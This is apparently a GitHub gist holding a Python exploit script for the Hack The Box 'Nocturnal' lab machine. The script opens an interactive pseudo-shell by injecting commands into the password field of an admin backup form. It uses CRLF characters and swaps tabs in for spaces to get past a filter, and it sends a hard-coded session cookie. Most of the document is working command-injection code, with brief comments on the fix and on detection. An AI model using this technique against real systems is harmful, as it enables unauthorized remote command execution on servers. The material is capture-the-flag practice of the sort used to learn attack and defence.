@sharpicx
Created June 6, 2025 20:39
HTB: Nocturnal
import requests
import urllib.parse
import readline
from bs4 import BeautifulSoup
import re
from termcolor import colored
url = "http://nocturnal.htb/admin.php?view=admin.php"

# Static request headers replayed on every POST. The PHPSESSID value is a
# fixed literal captured when this gist was written; it is bound to a single
# authenticated session, so the script only works while that session is valid.
headers = {
    "Host": "nocturnal.htb",
    "Cache-Control": "max-age=0",
    "Origin": "http://nocturnal.htb",
    "DNT": "1",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "en-US,en;q=0.9,id-ID;q=0.8,id;q=0.7",
    "Cookie": "PHPSESSID=u1uj8soq9c93bv8icmk5c8i655",
}

# Interactive loop: each line typed at the prompt is sent as the `password`
# field of the backup form, and whatever the page echoes back is printed.
# "exit"/"quit" (case-insensitive) or Ctrl-C ends the loop.
while True:
    try:
        cmd = input(colored("shell> ", "cyan"))
        if cmd.strip().lower() in ["exit", "quit"]:
            break
        # The typed text is placed after a CRLF-terminated dummy value and its
        # stdout is redirected to /dev/null, so only what the page itself
        # returns (parsed below) is displayed.
        injected = f"test\r\n{cmd}>/dev/null\r\n"
        # Percent-encode, then swap encoded spaces (%20) for encoded tabs (%09).
        # NOTE(review): presumably the server rejects literal spaces in
        # `password` but not tabs or CRLF. A per-character blocklist in front of
        # a shell call is not a mitigation; the server-side fix is to never hand
        # this field to a shell, and a request whose `password` field carries
        # tab or CR/LF bytes is a useful detection signal.
        encoded_payload = "password=" + urllib.parse.quote(injected).replace('%20', '%09') + "&backup="
        response = requests.post(url, headers=headers, data=encoded_payload)
        # The script expects the response body to carry the result inside
        # <div class="backup-output"><pre>...</pre></div>.
        soup = BeautifulSoup(response.text, "html.parser")
        output_div = soup.find("div", class_="backup-output")
        if output_div:
            pre = output_div.find("pre")
            if pre:
                raw = pre.text
                # Text up to this marker is presumably the page's own error for
                # the dummy "test" value; only what follows it is printed.
                split_marker = ".zip: not found"
                if split_marker in raw:
                    _, result = raw.split(split_marker, 1)
                    print(result.strip())
                else:
                    # Marker absent: show the whole <pre> body unchanged.
                    print(raw.strip())
            else:
                print(colored("No <pre> tag found in backup-output.", "red"))
        else:
            print(colored("No backup-output div found.", "red"))
    except KeyboardInterrupt:
        break